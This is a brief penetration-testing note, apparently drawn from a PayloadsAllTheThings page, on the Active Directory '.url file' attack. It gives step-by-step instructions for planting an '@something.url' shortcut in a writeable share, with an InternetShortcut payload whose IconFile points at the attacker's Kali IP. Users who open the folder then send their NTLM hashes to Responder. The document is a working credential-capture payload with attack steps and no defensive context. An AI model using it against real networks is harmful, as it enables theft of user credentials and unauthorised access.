URL File Attack

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Active Directory Attack.md#scf-and-url-file-attack-against-writeable-share

Assume a scenario when we have compromised a user and the user has shared access. We can use this access to capture the hashes using responder. For this we need a compromised user account or an open file share.

In the shared folder, create a file named: “@something.url” (include “ as well)

Inside the file paste the following content: Replace the IP with Kali IP

[InternetShortcut] URL=blah WorkingDirectory=blah IconFile=\\\\x.x.x.x\\%USERNAME%.icon IconIndex=1